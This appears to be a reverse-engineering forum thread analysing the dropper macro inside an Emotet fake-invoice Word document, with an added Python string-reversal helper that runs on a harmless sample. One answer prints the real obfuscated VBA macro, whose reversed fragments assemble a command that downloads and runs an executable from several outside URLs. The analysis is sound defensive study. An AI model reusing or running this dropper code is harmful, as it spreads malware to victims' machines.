Emotet invoice: what is the embedded file inside the Word document?

reverse-engineering binary-analysis malware
2021-06-25 11:30:04

This pastebin hosts the URL currently hosting the fake invoice carrying the Emotet malware; this is the dropper part of the malware.

The document is Office Open XML, with two large non-text sections inside it.

I can't make sense of the other section.

One of them looks like this: (screenshot)

I assume the other one contains at least some VB script and other things, but decoding it (assuming base64, like the jpg section) gives nothing that `file` recognizes.

2 Answers

Without looking at the file itself: apart from the VB script used as the macro, the second section is more likely some kind of obfuscated/encrypted executable.

However, given the obvious use of a macro, the executable (PE or script) is probably at least somewhat obfuscated and will only be decoded/decrypted right before being dropped to disk, or something along those lines.

Statically, your safest bet is to extract the macro (which isn't hard; by the standard, macros are quite obvious) and reverse the decoding/deobfuscation method it uses.

A simpler approach is to let the document drop the executable by opening it and letting the macro run inside a VM, optionally using something like Process Explorer / API Monitor to capture the dropped file.

The VBA seems to be something like this. The functions seem useless; zillnp seems to take this string:

(screenshot)

You can copy-paste the string and concatenate it:

Sub foo()
zwrqd = "c:\on" + "jzi" + "oi\" + "izwolr" + "\poic" + "wo\" + "..\" + "..\"
szrtncm = "..\win" + "dow" + "s\sys" + "tem32\" + "cmd." + "exe /c" + " %Pro" + "gram"
uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"
hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "'\'" + Chr(43) + "pmet" + ":vne"
wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "
uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr
MsgBox (uhdurz + jitovh + wwiqv)

End Sub
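The reassembly the answer above does by hand, as an added example (not code from the question or either answer): it reads the `name = "..." + Chr(n) + ...` assignments from a macro, concatenates each one in order, resolves the variables the final `MsgBox` line adds together, and reverses the result, since the fragments on the page read backwards ("www//:ptth" is "http://www"). The input is a constructed sample in the same style, not the real macro; it assumes the literals contain no embedded double quotes, which the quoted macro avoids by using Chr(34).

```python
import re

# Constructed sample in the style of the macro quoted in the answer above; the
# fragments spell a harmless reversed command, not the real Emotet strings.
SAMPLE_VBA = """
Sub foo()
a1 = Chr(34) + "elp" + "mas de" + "tcur"
a2 = "tsnoc" + Chr(34) + " oh" + "ce c" + "/ dmc"
total = a1 + a2
MsgBox (total)
End Sub
"""

# One token of a VBA concatenation: a string literal, a Chr(n) call, or a name.
TOKEN = re.compile(r'"([^"]*)"|Chr\((\d+)\)|([A-Za-z_]\w*)')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
MSGBOX = re.compile(r'^\s*MsgBox\s*\((.+)\)\s*$')


def eval_concat(rhs: str, env: dict) -> str:
    """Join the tokens of a VBA expression left to right, resolving earlier
    variables from env. The '+' operators are skipped because every token is
    concatenated anyway (assumes no '""' escapes inside literals)."""
    out = []
    for literal, chr_code, name in TOKEN.findall(rhs):
        if chr_code:
            out.append(chr(int(chr_code)))
        elif name:
            if name not in env:
                raise KeyError(f"unknown variable {name}")
            out.append(env[name])
        else:
            out.append(literal)
    return "".join(out)


def deobfuscate(vba: str) -> tuple:
    """Return (assembled string, assembled string reversed) for the MsgBox argument."""
    env = {}
    shown = None
    for line in vba.splitlines():
        if (m := MSGBOX.match(line)):
            shown = eval_concat(m.group(1), env)
        elif (m := ASSIGN.match(line)):
            env[m.group(1)] = eval_concat(m.group(2), env)
    if shown is None:
        raise ValueError("no MsgBox call found")
    return shown, shown[::-1]


if __name__ == "__main__":
    assembled, recovered = deobfuscate(SAMPLE_VBA)
    print("assembled:", assembled)
    print("reversed: ", recovered)
```

The same reversal is what the batch `for /L %h in (657,-1,0)` loop in the quoted string performs at run time, so the reversed output is what the dropper actually executes.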